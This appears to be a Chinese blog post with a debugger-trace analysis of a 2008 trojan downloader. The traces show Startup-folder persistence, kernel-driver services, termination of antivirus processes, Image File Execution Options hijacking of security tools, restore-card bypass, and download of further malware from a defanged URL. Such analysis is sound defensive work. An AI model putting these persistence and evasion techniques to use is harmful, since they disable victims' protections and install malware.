查看文章 |
[Trojan-Downloader.Win32.Small.mjy]-[MicroPoint]-ogame.exe分析
2008-03-16 11:55
从it.thtf网站下载的几个病毒一样,只是加壳不大相同. 挑ogame.exe分析: NsPacK V3.7 -> LiuXingPing * Sign.By.fly * 1.00418432 ^\E9 C98BFEFF jmp ogame.00401000 oep: 00401000 81EC 1C070000 sub esp,71C 00401006 55 push ebp 00401007 56 push esi 00401008 57 push edi 00401009 B9 0E000000 mov ecx,0E 0040100E BE C88E4000 mov esi,ogame.00408EC8 00401013 8DBC24 14020000 lea edi,dword ptr ss:[esp+214] 0040101A F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi] 2.是否是C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe 2.1 如果不是: 拷贝: 00401162 FF15 2C304000 call dword ptr ds:[40302C] ; KERNEL32.CopyFileA 0012F890 0012FCB8 |ExistingFileName = "C:\DOCUME~1\gao1\桌面\ogame.exe" 0012F894 0012F8A8 |NewFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe" 创建进程: 00401197 FF15 24304000 call dword ptr ds:[403024] ; KERNEL32.CreateProcessA 0012F874 0012F8A8 |ModuleFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe" 然后扫尾退出: 00402187 FF15 24304000 call dword ptr ds:[403024] ; KERNEL32.CreateProcessA 0012F300 0012F74C |ModuleFileName = "c:\_uninsep.bat" 00401365 6A 00 push 0 00401367 FF15 98304000 call dword ptr ds:[403098] ; KERNEL32.GetCurrentProcess 0040136D 50 push eax 0040136E FF15 A0304000 call dword ptr ds:[4030A0] ; KERNEL32.TerminateProcess 2.2 如果是 2.2.1 创建名为"Sc Manager"的系统服务: 创建usbcams3.sys: 004013A8 FF15 9C304000 call dword ptr ds:[40309C] ; KERNEL32.CreateFileA 0012F868 0012FDBC |FileName = "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbcams3.sys" 0012F86C 004013CD /CALL 到 WriteFile 来自 Display3.004013C7 0012F870 0000005C |hFile = 0000005C (window) 0012F874 00407B28 |Buffer = Display3.00407B28 0012F878 00001300 |nBytesToWrite = 1300 (4864.) 0012F87C 0012F894 |pBytesWritten = 0012F894 0012F880 00000000 \pOverlapped = NULL 创建服务"Sc Manager",加载后删除sys: 0012F838 00401447 /CALL 到 CreateServiceA 来自 Display3.00401441 0012F83C 001493D0 |hManager = 001493D0 0012F840 00408E98 |ServiceName = "Sc Manager" 0012F844 00408E98 |DisplayName = "Sc Manager" 0012F848 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS 0012F84C 00000001 |ServiceType = SERVICE_KERNEL_DRIVER 0012F850 00000003 |StartType = SERVICE_DEMAND_START 0012F854 00000000 |ErrorControl = SERVICE_ERROR_IGNORE 0012F858 0012FDBC |BinaryPathName = "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbcams3.sys" 0012F85C 00000000 |LoadOrderGroup = NULL 0012F860 00000000 |pTagId = NULL 0012F864 00000000 |pDependencies = NULL 0012F868 00000000 |ServiceStartName = NULL 0012F86C 00000000 \Password = NULL 2.2.2 创建进程: 0012F87C 004011EC /CALL 到 CreateThread 来自 Display3.004011EA 0012F880 00000000 |pSecurity = NULL 0012F884 00000000 |StackSize = 0 0012F888 00401FB0 |ThreadFunction = Display3.00401FB0 ; 对付avp,枚举进程,结束avp.exe 0012F88C 00000000 |pThreadParm = NULL 0012F890 00000000 |CreationFlags = 0 0012F894 00000000 \pThreadId = NULL 0012F87C 004011FD /CALL 到 CreateThread 来自 Display3.004011FB 0012F880 00000000 |pSecurity = NULL 0012F884 00000000 |StackSize = 0 0012F888 00401C60 |ThreadFunction = Display3.00401C60 ; 狂写注册表 0012F88C 00000000 |pThreadParm = NULL 0012F890 00000000 |CreationFlags = 0 0012F894 00000000 \pThreadId = NULL 生成以下注册表项来进行文件映像劫持: 20.12495804 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger ACCESS VIOLATION ... 58.65472794 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinDbg.exe\Debugger ACCESS VIOLATION 58.67476654 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger ACCESS VIOLATION 58.69480133 Display3D.exe:1232 SetValue HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\ACPI_HAL\PNP0C08\0\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger ACCESS VIOLATION 2.2.3 创建文件:usbhcid.sys 0012F888 0012FEC0 ASCII "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbhcid.sys" 0012F85C 004013CD /CALL 到 WriteFile 来自 Display3.004013C7 0012F860 000000A0 |hFile = 000000A0 (window) 0012F864 00405228 |Buffer = Display3.00405228 0012F868 00002900 |nBytesToWrite = 2900 (10496.) 0012F86C 0012F884 |pBytesWritten = 0012F884 0012F870 00000000 \pOverlapped = NULL 创建服务"iCafe Manager":加载后删除 0012F828 00401447 /CALL 到 CreateServiceA 来自 Display3.00401441 0012F82C 00149A88 |hManager = 00149A88 0012F830 00408E88 |ServiceName = "iCafe Manager" 0012F834 00408E88 |DisplayName = "iCafe Manager" 0012F838 000F01FF |DesiredAccess = SERVICE_ALL_ACCESS 0012F83C 00000001 |ServiceType = SERVICE_KERNEL_DRIVER 0012F840 00000003 |StartType = SERVICE_DEMAND_START 0012F844 00000000 |ErrorControl = SERVICE_ERROR_IGNORE 0012F848 0012FEC0 |BinaryPathName = "C:\DOCUME~1\gao1\LOCALS~1\Temp\usbhcid.sys" 0012F84C 00000000 |LoadOrderGroup = NULL 0012F850 00000000 |pTagId = NULL 0012F854 00000000 |pDependencies = NULL 0012F858 00000000 |ServiceStartName = NULL 0012F85C 00000000 \Password = NULL 2.2.4 破还原: 写文件到\\.\yyy2: 0012F730 00401745 /CALL 到 CreateFileA 来自 Display3.0040173F 0012F734 0012F75C |FileName = "\\.\yyy2" 0012F738 C0000000 |Access = GENERIC_READ|GENERIC_WRITE 0012F73C 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 0012F740 00000000 |pSecurity = NULL 0012F744 00000003 |Mode = OPEN_EXISTING 0012F748 00000000 |Attributes = 0 0012F74C 00000000 \hTemplateFile = NULL 通讯: 0012F72C 00401780 /CALL 到 DeviceIoControl 来自 Display3.0040177A 0012F730 000000A4 |hDevice = 000000A4 (window) 0012F734 8000F800 |IoControlCode = 8000F800 0012F738 0012F77C |InBuffer = 0012F77C 0012F73C 0000000C |InBufferSize = C (12.) 0012F740 00000000 |OutBuffer = NULL 0012F744 00000000 |OutBufferSize = 0 0012F748 0012F758 |pBytesReturned = 0012F758 0012F74C 00000000 \pOverlapped = NULL 拷贝过去: 0012F888 00401289 /CALL 到 CopyFileA 来自 Display3.00401287 0012F88C 0012FCB8 |ExistingFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\DISPLA~1.EXE" 0012F890 0012F8A8 |NewFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe" 0012F894 00000000 \FailIfExists = FALSE 0012F888 00401300 /CALL 到 CopyFileA 来自 Display3.004012FE 0012F88C 0012F8A8 |ExistingFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe" 0012F890 0012F9AC |NewFileName = "\\.\yyy2\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe" 0012F894 00000000 \FailIfExists = FALSE 0012F888 0040132A /CALL 到 OpenMutexA 来自 Display3.00401324 0012F88C 001F0001 |Access = 1F0001 0012F890 00000000 |Inheritable = FALSE 0012F894 00408E58 \MutexName = "SH0FJ_NET_PSOFJEIF__FJE3345FEF_HM" 0012F860 0040218D /CALL 到 CreateProcessA 来自 Display3.00402187 0012F864 0012F8A8 |ModuleFileName = "C:\DOCUME~1\ALLUSE~1\「开始~1\程序\启动\Display3D.exe" 0012F868 00000000 |CommandLine = NULL 0012F86C 00000000 |pProcessSecurity = NULL 0012F870 00000000 |pThreadSecurity = NULL 0012F874 00000000 |InheritHandles = FALSE 0012F878 00000000 |CreationFlags = 0 0012F87C 00000000 |pEnvironment = NULL 0012F880 00000000 |CurrentDir = NULL 0012F884 0014A1F8 |pStartupInfo = 0014A1F8 0012F888 00147B78 \pProcessInfo = 00147B78 0012F88C 0040134B /CALL 到 CreateMutexA 来自 Display3.00401345 0012F890 00000000 |pSecurity = NULL 0012F894 00000000 |InitialOwner = FALSE 0012F898 00408E58 \MutexName = "SH0FJ_NET_PSOFJEIF__FJE3345FEF_HM" 2.2.5 利用URLDownloadToFileA下载病毒: 0012F880 0040135C /CALL 到 CreateThread 来自 Display3.0040135A 0012F884 00000000 |pSecurity = NULL 0012F888 00000000 |StackSize = 0 0012F88C 00401D20 |ThreadFunction = Display3.00401D20 ; 下载病毒 0012F890 00000000 |pThreadParm = NULL 0012F894 00000000 |CreationFlags = 0 0012F898 00000000 \pThreadId = NULL 下载列表:00401DFD push Display3.00405020 ; ASCII "hxxp://www.qisihuisheng.net/new.txt" 下载到本地的名称为:00C9FB74 00C9FBA8 ASCII "C:\WINNT\system32\WIN.INI" 然后同样的回到扫尾工作. |
最近读者:
